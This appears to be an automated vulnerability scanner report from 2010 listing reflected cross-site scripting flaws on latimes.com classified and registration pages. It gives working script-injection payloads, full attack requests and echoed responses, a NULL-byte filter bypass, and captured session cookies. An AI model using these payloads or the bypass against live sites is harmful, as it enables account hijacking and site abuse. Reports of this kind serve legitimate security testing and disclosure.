</head> <body style="margin:0px;"> <script src="/hive/javascripts/video-tool.js" type="text/javascript"></script> <script src="/hive/javascripts/AC_OETag ...[SNIP]... version of Flash required var requiredMinorVersion = 0; // Minor version of Flash required var requiredRevision = 0; //video URL - use itemId = unique single video id var singleTemp = "ccb1f";alert(1)//5a3144ce737"; var multipleTemp = "2b1ee0af-96d0-4513-9efa-6fea81c043da"; var marketDomain = "latimes.com"; marketDomain = marketDomain.split(".");
The value of the layoutColumns request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 781c5"%3balert(1)//60a11eacb02 was submitted in the layoutColumns parameter. This input was echoed as 781c5";alert(1)//60a11eacb02 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=UTF-8
X-Instance-Name: i6s30z2n1
Vary: Accept-Encoding
Cache-Control: private, max-age=300
Date: Sun, 12 Dec 2010 18:53:59 GMT
Connection: close
Content-Length: 9210

//player atrributes
var playerAvailable = "&playerAvailable=true";
var searchAvailable = "&searchAvailable=false";
var layoutColumns = "&layoutColumns=1781c5";alert(1)//60a11eacb02";
var carouselType = "&carouselType=horz";
var titleAvailable = "&titleAvailable=true";
var autoPlay = "&autoPlayVideo=false";
The value of the listType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 348b6"%3balert(1)//ad28c45f11e was submitted in the listType parameter. This input was echoed as 348b6";alert(1)//ad28c45f11e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=UTF-8
X-Instance-Name: i6s27z1n1
Vary: Accept-Encoding
Cache-Control: private, max-age=300
Date: Sun, 12 Dec 2010 18:53:59 GMT
Connection: close
Content-Length: 9210

<html>
<head>
</head>
<body style="margin:0px;">
<script src="/hive/javascripts/video-tool.js" type="text/javascript"></script>
<script src="/hive/javascripts/AC_OETag ...[SNIP]... yer atrributes
var playerAvailable = "&playerAvailable=true";
var searchAvailable = "&searchAvailable=false";
var layoutColumns = "&layoutColumns=1";
var carouselType = "&carouselType=horz348b6";alert(1)//ad28c45f11e";
var titleAvailable = "&titleAvailable=true";
var autoPlay = "&autoPlayVideo=false";
The value of the class request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0096499"><script>alert(1)</script>d30646ceac2 was submitted in the class parameter. This input was echoed as 96499"><script>alert(1)</script>d30646ceac2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /classified/genmerch/results.classified?start_date=%3C+today&end_date=&sortfields=graphic+desc%2C+start_date+desc%2C+title&keyword=&type=boolean&class=1486%2C+32100%0096499"><script>alert(1)</script>d30646ceac2&class=1489%2C+32300&class=1492%2C+32200&days=7&date=all HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=ISO-8859-1
X-Instance-Name: i6s27z1n1
Cache-Control: private, max-age=300
Date: Sun, 12 Dec 2010 19:03:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 125331

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of the days request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f323b"><script>alert(1)</script>47f559738f9 was submitted in the days parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /classified/genmerch/results.classified?start_date=%3C+today&end_date=&sortfields=graphic+desc%2C+start_date+desc%2C+title&keyword=&type=boolean&class=8400%2C+40760&days=7f323b"><script>alert(1)</script>47f559738f9&date=all HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=ISO-8859-1
X-Instance-Name: i6s28z2n1
Cache-Control: private, max-age=300
Date: Sun, 12 Dec 2010 19:02:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120755

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
1.20. http://www.latimes.com/classified/genmerch/results.classified [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.latimes.com
Path: /classified/genmerch/results.classified
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94dc0"><script>alert(1)</script>da0e2def822 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /classified/genmerch/results.classified?class=1730%2C%2010450&94dc0"><script>alert(1)</script>da0e2def822=1 HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=ISO-8859-1
X-Instance-Name: i6s27z1n1
Cache-Control: private, max-age=271
Date: Sun, 12 Dec 2010 19:00:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109406

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of the class request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4446f"><script>alert(1)</script>17df8f96b33 was submitted in the class parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /classified/realestate/rentals/results.classified?start_date=%3C+today&end_date=&sortfields=graphic+desc%2C+start_date+desc%2C+title&keyword=&type=boolean&class=6005-6060%2C+55011%2C+55020%2C+55030%2C+55032%2C+550344446f"><script>alert(1)</script>17df8f96b33&days=7&date=all HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=ISO-8859-1
X-Instance-Name: i6s27z2n1
Cache-Control: private, max-age=300
Date: Sun, 12 Dec 2010 19:00:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 136354

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of the days request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ed67"><script>alert(1)</script>8093fc9f1fb was submitted in the days parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /classified/realestate/rentals/results.classified?start_date=%3C+today&end_date=&sortfields=graphic+desc%2C+start_date+desc%2C+title&keyword=&type=boolean&class=6005-6060%2C+55011%2C+55020%2C+55030%2C+55032%2C+55034&days=74ed67"><script>alert(1)</script>8093fc9f1fb&date=all HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=ISO-8859-1
X-Instance-Name: i6s30z2n1
Cache-Control: private, max-age=300
Date: Sun, 12 Dec 2010 19:00:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 136340

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
1.23. http://www.latimes.com/classified/realestate/rentals/results.classified [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.latimes.com
Path: /classified/realestate/rentals/results.classified
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3ca4"><script>alert(1)</script>cfde8c47090 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /classified/realestate/rentals/results.classified?start_date=%3C+today&end_date=&sortfields=graphic+desc%2C+start_date+desc%2C+title&keyword=&type=boolean&class=6005-6060%2C+55011%2C+55020%2C+55030%2C+55032%2C+55034&days=7&date=all&a3ca4"><script>alert(1)</script>cfde8c47090=1 HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=ISO-8859-1
X-Instance-Name: i6s30z1n1
Cache-Control: private, max-age=300
Date: Sun, 12 Dec 2010 19:01:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 136220

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ae19"><script>alert(1)</script>49051fb6d3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services7ae19"><script>alert(1)</script>49051fb6d3c/site/registration/logout.register HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html
X-Instance-Name: i6s29z2n1
Content-Location: /signon/login-landing.jsp
Expires: Sun, 12 Dec 2010 18:55:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 12 Dec 2010 18:55:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 101444

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1005d"><script>alert(1)</script>ed4fc37d7f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/site1005d"><script>alert(1)</script>ed4fc37d7f5/registration/logout.register HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
